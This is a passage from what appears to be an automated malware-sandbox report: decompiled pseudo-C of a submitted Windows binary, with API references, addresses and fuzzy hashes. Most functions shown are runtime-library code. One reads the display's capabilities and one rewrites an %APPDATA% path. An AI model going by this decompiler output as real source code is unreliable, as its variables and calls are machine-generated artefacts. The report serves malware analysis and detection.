				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x458128, _t33, _t39, _t23, _t27);
				_t24 = _t11;
				_v8 = _t24;
				_t41 =  *_t40( *0x458124);
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E004288CC(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer;
							 *_t41 =  *_t37(_a4);
							 *0x458124 =  *_t37(_t41 + 4);
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E00424EA0(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E00424EA0(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x458128 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}

0x00421ef6
0x00421f03
0x00421f0b
0x00421f0d
0x00421f12
0x00421f16
0x00421f9d
0x00421f9d
0x00421f1c
0x00421f1e
0x00421f20
0x00421f26
0x00000000
0x00421f28
0x00421f2e
0x00421f30
0x00421f36
0x00421f80
0x00421f83
0x00421f8b
0x00421f93
0x00421f98
0x00421f38
0x00421f38
0x00421f3f
0x00421f41
0x00421f41
0x00421f43
0x00421f47
0x00421f58
0x00421f58
0x00421f58
0x00421f5d
0x00000000
0x00421f5f
0x00421f63
0x00421f6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f6c
0x00421f49
0x00421f4d
0x00421f56
0x00421f6e
0x00421f72
0x00421f75
0x00421f7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f56
0x00421f47
0x00421f36
0x00421f26
0x00421fa3

APIs

DecodePointer.KERNEL32(00445C90,0043525C,00000400,?,?,00421FF2,00000400,00440FA0,0000000C,0042201E,00000400,?,004204CB,004347EF,00000400), ref: 00421F03
DecodePointer.KERNEL32(?,?,00421FF2,00000400,00440FA0,0000000C,0042201E,00000400,?,004204CB,004347EF,00000400), ref: 00421F10
__realloc_crt.LIBCMT ref: 00421F4D
__realloc_crt.LIBCMT ref: 00421F63
EncodePointer.KERNEL32(00000000,?,?,00421FF2,00000400,00440FA0,0000000C,0042201E,00000400,?,004204CB,004347EF,00000400), ref: 00421F75
EncodePointer.KERNEL32(00000400,?,?,00421FF2,00000400,00440FA0,0000000C,0042201E,00000400,?,004204CB,004347EF,00000400), ref: 00421F89
EncodePointer.KERNEL32(-00000004,?,?,00421FF2,00000400,00440FA0,0000000C,0042201E,00000400,?,004204CB,004347EF,00000400), ref: 00421F91

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: c26089b250db02d05d6faadff42d5e03ac9bcc7c34fac5989a93a3e5bc10fd4d
Instruction ID: fae5462dfded186cd22c04ea94a33d2b3d33809764ca2279c499bc6fe309893d
Opcode Fuzzy Hash: c26089b250db02d05d6faadff42d5e03ac9bcc7c34fac5989a93a3e5bc10fd4d
Instruction Fuzzy Hash: 6111D672700235AFDB00AF65FE8189A77E9EB54324362043BE515E3261EF79ED448B8C

Uniqueness

Uniqueness Score: -1.00%

Function 004172C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004172C7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				void* _t29;
				void* _t31;
				struct HDC__* _t41;
				void* _t52;
				void* _t54;
				void* _t57;
				void* _t61;

				_t61 = __eflags;
				_t52 = __edx;
				_push(0x7c);
				E00423679(E00433E1F, __ebx, __edi, __esi);
				_t54 = __ecx;
				 *((intOrPtr*)(_t57 - 0x88)) = 0;
				_t41 = CreateDCA("DISPLAY", 0, 0, 0);
				 *((intOrPtr*)(_t57 - 0x88)) = GetDeviceCaps(_t41, 8);
				 *((intOrPtr*)(_t57 - 0x84)) = GetDeviceCaps(_t41, 0xa);
				ReleaseDC(0, _t41);
				_push( *((intOrPtr*)(_t57 - 0x84)));
				 *((intOrPtr*)(_t57 - 0x84)) = E00417C07(_t41, _t57 - 0x80, _t52, _t54, 0, _t61);
				_push( *((intOrPtr*)(_t57 - 0x88)));
				_t46 = _t57 - 0x64;
				 *((intOrPtr*)(_t57 - 4)) = 0;
				_t27 = E00417C07(_t41, _t57 - 0x64, _t52, _t54, 0, _t61);
				 *((char*)(_t57 - 4)) = 1;
				_t29 = E00404DB2(_t57 - 0x64, _t57 - 0x48, 0x43d12c, _t27);
				 *((char*)(_t57 - 4)) = 2;
				_t31 = E0040CEB4(_t46, _t57 - 0x2c, _t29, "x");
				 *((char*)(_t57 - 4)) = 3;
				E00404DE3( *((intOrPtr*)(_t57 - 0x84)), _t31, _t54);
				E00404A66(_t57 - 0x2c, 1, 0);
				E00404A66(_t57 - 0x48, 1, 0);
				E00404A66(_t57 - 0x64, 1, 0);
				E00404A66(_t57 - 0x80, 1, 0);
				return E004236C3(1, _t54, 0);
			}

0x004172c7
0x004172c7
0x004172c7
0x004172ce
0x004172dd
0x004172df
0x004172eb
0x004172f9
0x00417307
0x0041730d
0x00417313
0x00417321
0x00417327
0x0041732d
0x00417330
0x00417333
0x00417345
0x00417348
0x0041735a
0x0041735e
0x0041736e
0x00417372
0x0041737c
0x00417386
0x00417390
0x0041739a
0x004173a6

APIs

__EH_prolog3_GS.LIBCMT ref: 004172CE
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004172E5
GetDeviceCaps.GDI32(00000000,00000008), ref: 004172F0
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004172FF
ReleaseDC.USER32(00000000,00000000), ref: 0041730D

Part of subcall function 00417C07: __EH_prolog3_GS.LIBCMT ref: 00417C11
Part of subcall function 00417C07: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417D14

Part of subcall function 00404DB2: _strlen.LIBCMT ref: 00404DBF

Part of subcall function 0040CEB4: _strlen.LIBCMT ref: 0040CEC1

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Strings

DISPLAY, xrefs: 004172D8

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CapsDeviceH_prolog3__strlen$CreateIos_base_dtorRelease_memmovestd::ios_base::_
String ID: DISPLAY
API String ID: 1291928524-865373369
Opcode ID: 4564af0d98eb6a3e56daa3a98485e2c8d59929e326c823345a19ba6bb619e757
Instruction ID: 53a7f9f43263ed5452250eb93e4ab3d79c151cd008275c7cdaf32cfb9feb2c7d
Opcode Fuzzy Hash: 4564af0d98eb6a3e56daa3a98485e2c8d59929e326c823345a19ba6bb619e757
Instruction Fuzzy Hash: A12144B1D01114ABCB11EBA5CD85FDE7FBCAF55354F1040AAF209A2151DE384B45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004236FA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004236FA(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t9;
				char* _t11;
				char* _t12;
				void* _t16;
				signed int _t17;
				void* _t29;
				char* _t30;
				void* _t31;

				_push(__ebx);
				_t29 = E004280F9(__ebx);
				if(_t29 != 0) {
					if( *(_t29 + 0x24) != 0) {
						L7:
						_t30 =  *(_t29 + 0x24);
						if(E004203AC(_t30, 0x86, E004236D2(_a4)) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t9 = E0042685C();
							asm("int3");
							_push(_t30);
							_t31 = _t16;
							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
								_push(0x86);
								_t17 = 0x36;
								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
								_t9 = E00427C89(_t10);
							}
							return _t9;
						} else {
							_t11 = _t30;
							goto L5;
						}
					} else {
						_t12 = E00424E54(0x86, 1);
						_pop(_t16);
						 *(_t29 + 0x24) = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t11;
				}
			}

0x004236ff
0x00423706
0x0042370c
0x0042371e
0x0042373b
0x0042373e
0x00423753
0x00423759
0x0042375a
0x0042375b
0x0042375c
0x0042375d
0x0042375e
0x00423763
0x00423766
0x00423767
0x0042376b
0x00423775
0x00423778
0x0042377d
0x00423781
0x00423787
0x00423789
0x00423755
0x00423755
0x00000000
0x00423755
0x00423720
0x00423723
0x00423729
0x0042372a
0x0042372f
0x00000000
0x00423731
0x00423731
0x00423736
0x00000000
0x00423736
0x0042372f
0x0042370e
0x0042370e
0x00423737
0x0042373a
0x0042373a

APIs

__getptd_noexit.LIBCMT ref: 00423701

Part of subcall function 004280F9: GetLastError.KERNEL32(00000000,000003E8,00424F35,0041FCE4,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 004280FD
Part of subcall function 004280F9: ___set_flsgetvalue.LIBCMT ref: 0042810B
Part of subcall function 004280F9: __calloc_crt.LIBCMT ref: 0042811F
Part of subcall function 004280F9: DecodePointer.KERNEL32(00000000,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 00428139
Part of subcall function 004280F9: GetCurrentThreadId.KERNEL32 ref: 0042814F
Part of subcall function 004280F9: SetLastError.KERNEL32(00000000,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 00428167

__calloc_crt.LIBCMT ref: 00423723
__get_sys_err_msg.LIBCMT ref: 00423741
_strcpy_s.LIBCMT ref: 00423749
__invoke_watson.LIBCMT ref: 0042375E

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 0042370E, 00423731

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 9bbf43bcb39161569231785493f34ab3c9877fe10f27d753ea1129a048292dc1
Instruction ID: 20d23e40b28ab32137d2e609f6d2fdb2064273b3eedde90a5f19fd9d59c90f86
Opcode Fuzzy Hash: 9bbf43bcb39161569231785493f34ab3c9877fe10f27d753ea1129a048292dc1
Instruction Fuzzy Hash: FBF0F6F2704230679B203D167CC192BA1ACCBD47AAB91843FFA4997201EA6D9D01419D

Uniqueness

Uniqueness Score: -1.00%

Function 00428045 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00428045(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x441388);
				E00428900(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x436c38;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x444678;
				E00428F70(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t12 = _t39 + 0x68; // 0xf18b5608
				InterlockedIncrement( *_t12);
				 *(_t40 - 4) = 0xfffffffe;
				E004280E7();
				E00428F70(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x444de0; // 0x5b11a0
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				_t18 = _t39 + 0x6c; // 0xc46c6
				E00427C89( *_t18);
				 *(_t40 - 4) = 0xfffffffe;
				return E00428945(E004280F0());
			}

0x00428045
0x00428045
0x00428047
0x0042804c
0x00428056
0x0042805c
0x0042805f
0x00428066
0x0042806d
0x00428070
0x00428073
0x0042807a
0x00428081
0x0042808a
0x00428090
0x00428094
0x00428097
0x0042809d
0x004280a4
0x004280ab
0x004280b1
0x004280b4
0x004280b7
0x004280bc
0x004280be
0x004280c3
0x004280c3
0x004280c6
0x004280c9
0x004280cf
0x004280e0

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00441388,00000008,0042814D,00000000,00000000,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 00428056
__lock.LIBCMT ref: 0042808A

Part of subcall function 00428F70: __mtinitlocknum.LIBCMT ref: 00428F86
Part of subcall function 00428F70: __amsg_exit.LIBCMT ref: 00428F92
Part of subcall function 00428F70: EnterCriticalSection.KERNEL32(00420486,00420486,?,0042808F,0000000D), ref: 00428F9A

InterlockedIncrement.KERNEL32(F18B5608), ref: 00428097
__lock.LIBCMT ref: 004280AB
___addlocaleref.LIBCMT ref: 004280C9

Strings

KERNEL32.DLL, xrefs: 00428051

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: b4f99720c2cce44326f16160e7fdb9a22c26c1d9fae0ff7f7796e0c44d49c088
Instruction ID: bb6f45683f5fe3ba693b0b61763fd04858213ff14b91794af9f33a5fecc060ed
Opcode Fuzzy Hash: b4f99720c2cce44326f16160e7fdb9a22c26c1d9fae0ff7f7796e0c44d49c088
Instruction Fuzzy Hash: 5301A171502B00DFE7209F6AE80570DFBE0AF50324F61854FE495926A0CFB8A984CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F142 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F142(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				void* _t38;

				_t35 = __edi;
				_push(0xc);
				E00423610(E00432F44, __ebx, __edi, __esi);
				_t37 =  *((intOrPtr*)(_t38 + 8));
				E0041F1C0(_t37, 0);
				 *((intOrPtr*)(_t38 - 4)) = 0;
				 *((intOrPtr*)(_t37 + 4)) = 0;
				 *((char*)(_t37 + 8)) = 0;
				 *((intOrPtr*)(_t37 + 0xc)) = 0;
				 *((char*)(_t37 + 0x10)) = 0;
				 *((intOrPtr*)(_t37 + 0x14)) = 0;
				 *((char*)(_t37 + 0x18)) = 0;
				 *((intOrPtr*)(_t37 + 0x1c)) = 0;
				 *((char*)(_t37 + 0x20)) = 0;
				 *((char*)(_t38 - 4)) = 4;
				_t40 =  *(_t38 + 0xc);
				if( *(_t38 + 0xc) == 0) {
					 *(_t38 + 0xc) = "bad locale name";
					E0041FD77(_t38 - 0x18, _t38 + 0xc);
					 *((intOrPtr*)(_t38 - 0x18)) = 0x435210;
					E004231B6(_t38 - 0x18, 0x441678);
				}
				E0041EFE7(0, _t35, _t37, _t40, _t37,  *(_t38 + 0xc));
				return E004236AF(_t37);
			}

0x0040f142
0x0040f142
0x0040f149
0x0040f14e
0x0040f156
0x0040f15b
0x0040f15e
0x0040f161
0x0040f164
0x0040f167
0x0040f16a
0x0040f16d
0x0040f170
0x0040f173
0x0040f176
0x0040f17a
0x0040f17d
0x0040f186
0x0040f18d
0x0040f19b
0x0040f1a2
0x0040f1a2
0x0040f1ab
0x0040f1b9

APIs

__EH_prolog3.LIBCMT ref: 0040F149
std::_Lockit::_Lockit.LIBCPMT ref: 0040F156
std::exception::exception.LIBCMT ref: 0040F18D

Part of subcall function 0041FD77: std::exception::_Copy_str.LIBCMT ref: 0041FD92

__CxxThrowException@8.LIBCMT ref: 0040F1A2

Part of subcall function 004231B6: RaiseException.KERNEL32(?,?,004204E6,?,?,?,?,?,004204E6,?,00441640,00445C90,?,?,0040B965,00000400), ref: 004231F8

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040F1AB

Strings

bad locale name, xrefs: 0040F186

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 637683493-1405518554
Opcode ID: d0393f00dbb3e79d6352683daeeab2fad641034f4b46a2db05d33acd95a8cf7a
Instruction ID: 546f8d741c2159b38abbe2ac6f0ede6c2e8fa1730b614e7210783a5925dcde3b
Opcode Fuzzy Hash: d0393f00dbb3e79d6352683daeeab2fad641034f4b46a2db05d33acd95a8cf7a
Instruction Fuzzy Hash: EA01B171900B44EECB20DF5A844158EBBB4BF28304F80C56FE19997241C7389749CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00417B0B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00417B0B(char* __eax, char* _a4, intOrPtr _a8) {
				char* _t12;
				void* _t13;
				void* _t15;
				CHAR* _t16;
				char* _t18;

				_t18 = __eax;
				_t12 = StrStrA(__eax, _a4);
				if(_t12 != 0) {
					_t15 = _t12 - _t18;
					_t18 = 0x4477f0;
					 *0x447458(0x4477f0, _t18, _t15, _t13);
					_t3 = _t15 + 0x4477f0; // 0x555c3a43
					_t16 = _t3;
					 *_t16 = 0;
					wsprintfA(_t16, "%s%s", _a8, E004201E0(_a4) + _t12);
				}
				return _t18;
			}

0x00417b13
0x00417b1c
0x00417b20
0x00417b25
0x00417b29
0x00417b2f
0x00417b38
0x00417b38
0x00417b3e
0x00417b52
0x00417b5b
0x00417b61

APIs

StrStrA.SHLWAPI(?,00000000,000003E8,00000000,?,0040A468,%APPDATA%,00000000,?,?,?,?,?,?,?,?), ref: 00417B16
lstrcpyn.KERNEL32(C:\Users\user\Documents\,?,00000000,000F4240,?,0040A468,%APPDATA%,00000000,?,?,?,?,?,?,?,?), ref: 00417B2F
_strlen.LIBCMT ref: 00417B41
wsprintfA.USER32 ref: 00417B52

Strings

C:\Users\user\Documents\, xrefs: 00417B29, 00417B2E
%s%s, xrefs: 00417B4C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlenlstrcpynwsprintf
String ID: %s%s$C:\Users\user\Documents\
API String ID: 3492880386-2936775873
Opcode ID: 34c5cc72a0d9f7b00d6264f44ca3050d05ea9b1a8460faf6d58d79b5a43b8bcb
Instruction ID: 45d5cdb142f37cb3654ef9b061f2754f9b597453f79c0e4bbc425829bc548419
Opcode Fuzzy Hash: 34c5cc72a0d9f7b00d6264f44ca3050d05ea9b1a8460faf6d58d79b5a43b8bcb
Instruction Fuzzy Hash: 75F0A73620821A7BD7111F999C44DABBF6DEF467A8B040076FE0893311CB75AD12C6F9

Uniqueness

Uniqueness Score: -1.00%

Function 004252CD Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E004252CD(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x441248);
				E00428900(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E0042350B(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00428172(__ecx, __edx, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00428172(_t48, __edx, _t61) + 0x8c));
				 *((intOrPtr*)(E00428172(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00428172(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E004235B0(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E004253F3(_t48, _t53, _t55, _t57, _t61);
				return E00428945( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x004252cd
0x004252cd
0x004252cd
0x004252cf
0x004252d4
0x004252d9
0x004252db
0x004252de
0x004252e1
0x004252e4
0x004252eb
0x004252fc
0x0042530a
0x00425318
0x00425320
0x0042532e
0x00425334
0x0042533b
0x0042533e
0x00425354
0x00425357
0x004253cc
0x004253d3
0x004253da
0x004253e7

APIs

__CreateFrameInfo.LIBCMT ref: 004252F5

Part of subcall function 0042350B: __getptd.LIBCMT ref: 00423519
Part of subcall function 0042350B: __getptd.LIBCMT ref: 00423527

__getptd.LIBCMT ref: 004252FF

Part of subcall function 00428172: __getptd_noexit.LIBCMT ref: 00428175
Part of subcall function 00428172: __amsg_exit.LIBCMT ref: 00428182

__getptd.LIBCMT ref: 0042530D
__getptd.LIBCMT ref: 0042531B
__getptd.LIBCMT ref: 00425326
_CallCatchBlock2.LIBCMT ref: 0042534C

Part of subcall function 004235B0: __CallSettingFrame@12.LIBCMT ref: 004235FC

Part of subcall function 004253F3: __getptd.LIBCMT ref: 00425402
Part of subcall function 004253F3: __getptd.LIBCMT ref: 00425410

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 59ef5d8434b7db39972b88803a663cb23f99785b60372083f2271d329265d8df
Instruction ID: eac44c5b5c75d07bdc0e4a65bb2d4150cecf0b3a6276f82ebd49d8338f9958a2
Opcode Fuzzy Hash: 59ef5d8434b7db39972b88803a663cb23f99785b60372083f2271d329265d8df
Instruction Fuzzy Hash: 871129B1D01219DFDB00EFA5D846AAD7BB1FF04314F5080AEF854A7251DB788A529F54

Uniqueness

Uniqueness Score: -1.00%

Function 004277C8 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E004277C8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x441328);
				E00428900(__ebx, __edi, __esi);
				_t31 = E00428172(__ebx, __edx, _t35);
				_t15 =  *0x444b98; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00428F70(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x444aa0; // 0x5b1628
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x444678;
								if(__eflags != 0) {
									E0041FC21(_t33);
								}
							}
						}
						_t21 =  *0x444aa0; // 0x5b1628
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x444aa0; // 0x5b1628
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00427863();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0042635D(_t29, _t38);
				}
				return E00428945(_t33);
			}

0x004277c8
0x004277c8
0x004277c8
0x004277c8
0x004277ca
0x004277cf
0x004277d9
0x004277db
0x004277e3
0x00427804
0x0042780a
0x0042780e
0x00427811
0x00427814
0x0042781a
0x0042781c
0x0042781e
0x00427827
0x00427829
0x0042782b
0x00427831
0x00427834
0x00427839
0x00427831
0x00427829
0x0042783a
0x0042783f
0x00427842
0x00427848
0x0042784c
0x0042784c
0x00427852
0x00427859
0x004277eb
0x004277eb
0x004277eb
0x004277ee
0x004277f0
0x004277f2
0x004277f4
0x004277f9
0x00427801

APIs

__getptd.LIBCMT ref: 004277D4

Part of subcall function 00428172: __getptd_noexit.LIBCMT ref: 00428175
Part of subcall function 00428172: __amsg_exit.LIBCMT ref: 00428182

__amsg_exit.LIBCMT ref: 004277F4
__lock.LIBCMT ref: 00427804
InterlockedDecrement.KERNEL32(?), ref: 00427821
_free.LIBCMT ref: 00427834
InterlockedIncrement.KERNEL32(005B1628), ref: 0042784C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 24c9e60240c13bc19742af2f2d5c34b1bf740c3d050fd024ef2dc7b03f32e967
Instruction ID: 61b5b6a56d63da554d2afd99663abbb448f90019c438256928cac300923a8e91
Opcode Fuzzy Hash: 24c9e60240c13bc19742af2f2d5c34b1bf740c3d050fd024ef2dc7b03f32e967
Instruction Fuzzy Hash: C4018E35B096319BD711AB69B84975EB360BF41755F85002FE801A3690CB7C6C81CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1BC Relevance: 9.0, APIs: 6, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F1BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				void* _t40;

				_push(0);
				E00423610(E00432EDA, __ebx, __edi, __esi);
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *(_t40 - 4) = 4;
				E0041EF74(_t39);
				_t20 =  *(_t39 + 0x1c);
				if( *(_t39 + 0x1c) != 0) {
					E0041FC21(_t20);
				}
				 *(_t39 + 0x1c) =  *(_t39 + 0x1c) & 0x00000000;
				_t21 =  *(_t39 + 0x14);
				if( *(_t39 + 0x14) != 0) {
					E0041FC21(_t21);
				}
				 *(_t39 + 0x14) =  *(_t39 + 0x14) & 0x00000000;
